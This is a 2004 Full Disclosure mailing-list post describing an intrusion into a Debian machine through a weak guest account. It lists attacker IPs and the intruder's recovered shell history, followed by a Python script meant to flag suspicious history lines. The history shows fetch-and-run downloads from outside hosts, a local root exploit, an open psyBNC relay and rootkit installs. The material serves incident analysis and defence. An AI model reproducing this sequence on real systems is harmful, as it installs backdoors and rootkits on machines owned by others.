Full Disclosure mailing list archives
Re: !SPAM! Automated ssh scanning
From: Richard Verwayen <holle () ackw de>
Date: Thu, 26 Aug 2004 19:44:46 +0200
On Thu, 2004-08-26 at 18:36, Tremaine wrote:
> On Thu, 26 Aug 2004 09:43:13 -0500 (CDT), Ron DuFresne <dufresne () winternet com> wrote:
>> On Thu, 26 Aug 2004, Richard Verwayen wrote:
>>> On Thu, 2004-08-26 at 15:12, Todd Towles wrote:
>>>> The kernel could be safe. But with weak passwords, you are toast. Any automated tool would test guest/guest.
>>>
>>> Hello Todd!
>>> You are right about the passwords, but guest is only an unprivileged account as you may have on many production machines. But they managed to become root on this machine due to a kernel(?) exploit! Should I then consider any woody system to be insecure to let people work at?
>>
>> If your users are not trustable, then they should not have access to local systems of yours. Once a person has a shell, then they are 95% to root.
>>
>> Thanks,
>> Ron DuFresne
>
> Fair point... but it would still be nice to determine precisely how they are getting root access so preventative measures can be taken and the hole plugged.
Some more info, maybe useful:

Hosts from which they logged in as my "guest":

213.154.103.49
213.154.103.40
213.154.103.49
210.177.241.201
66.250.216.109
66.250.216.109
210.52.66.56
62.108.109.163
62.108.109.163
213-35-199-254-dsl.mus.estpak.ee
0x50a349b6.unknown.tele.dk

Way the attacker got r00t (as listed in guest's history):

PATH=:PATH xs
uname -a
exit
PATH=:PATH xs
logout
exit
w
cat /etc/hosts
cd /tmp
wget www.bo2k-rulez.net/a
chmod +x a
./a
wget www.bo2k-rulez.net/psybnc.tgz
tar zfvx psybnc.tgz
cd psybnc
make
mv psybnc xs
sh
uname -a
ls
pico psybnc.conf
rm -rf psybnc.conf
echo "PSYBNC.SYSTEM.PORT1=21221" >> psybnc.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> psybnc.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> psybnc.conf
killall -9 xs
sh
exit
logout
cd /var/tmp/
wget sky.prohosting.com/awxro/linux/xpl.tar.gz
tar xzvf xpl.tar.gz
xpl/ptr1
wget www.bo2k-rulez.net/a
./a
chmod =x a
./a
rm -rf a
exit
exit
passwd
passwd
ls -al
hostname
w
cat /etc/hosts
ifconfig
/sbin/ifconfig
cd /tmp
mkdir ...
wget www.corbeanu.as.ro/t.gz
tar zxvf t.gz
./t
mv fastmech httpd
export PAT="."
export PATH="."
httpd
httpd
wget www.corbeanu.as.ro/god.tgz
wget www.geocities.com/sniffhax/god.tgz
wget roamy.com/god.tgz
wget roarmy.com/god.tgz
tar zxvf god.tgz
cd god
./install
wget www.corbeanu.as.ro/rkid.tgz
tar zxvf rkid.tgz
cd rkid
./setup stelian 6006
ls
ls -a
wget www.generatiapro.go.ro/fast.tgz
tar zxvf fast.tgz
cd fastmech
bash

--
Richard Verwayen <holle () ackw de>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
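A defender-side way to triage a shell history like the one posted above, as an added example that is not part of the original message: it flags downloads into world-writable directories, execution from those directories, PATH values that include the current directory, and directories named only with dots. The rule names, the `audit_history` function and the sample lines are assumptions constructed for illustration.

```python
import posixpath
import re
import shlex

STAGING = ("/tmp", "/var/tmp", "/dev/shm")   # world-writable drop locations
FETCHERS = {"wget", "curl", "fetch"}
PATH_SET = re.compile(r'^(?:export\s+)?PATH=(\S*)')

def audit_history(lines):
    """Return (line_no, rule, command) tuples for suspicious history entries."""
    findings, cwd = [], "~"
    for no, raw in enumerate(lines, 1):
        cmd = raw.strip()
        if not cmd:
            continue
        m = PATH_SET.match(cmd)
        if m:
            # An empty or "." component makes the shell search the current directory.
            parts = m.group(1).strip("\"'").split(":")
            if any(p in ("", ".") for p in parts):
                findings.append((no, "path-includes-cwd", cmd))
            continue
        try:
            argv = shlex.split(cmd)
        except ValueError:              # unbalanced quotes: plain whitespace split
            argv = cmd.split()
        prog, args = argv[0], argv[1:]
        if prog == "cd" and args:       # track the working directory across lines
            cwd = posixpath.normpath(posixpath.join(cwd, args[0]))
            continue
        in_staging = any(cwd == d or cwd.startswith(d + "/") for d in STAGING)
        if prog in FETCHERS and in_staging:
            findings.append((no, "fetch-into-staging", cmd))
        elif prog.startswith("./") and in_staging:
            findings.append((no, "exec-from-staging", cmd))
        elif prog == "mkdir" and any(len(a) > 2 and not a.strip(". ") for a in args):
            findings.append((no, "dot-named-dir", cmd))
    return findings

# Constructed sample history; the host name is a placeholder, not from the post.
SAMPLE = ["w", "cd /var/tmp/", "wget files.example.invalid/tool.tgz",
          "tar zxvf tool.tgz", "cd tool", "./install", "cd /tmp", "mkdir ...",
          'export PATH="."', "PATH=:PATH xs", "ls -al"]

if __name__ == "__main__":
    for no, rule, cmd in audit_history(SAMPLE):
        print(f"{no:>3}  {rule:<20} {cmd}")
```

History files are attacker-writable, so a clean result proves nothing; findings like these are a starting point for pulling process accounting, auth logs and file timestamps.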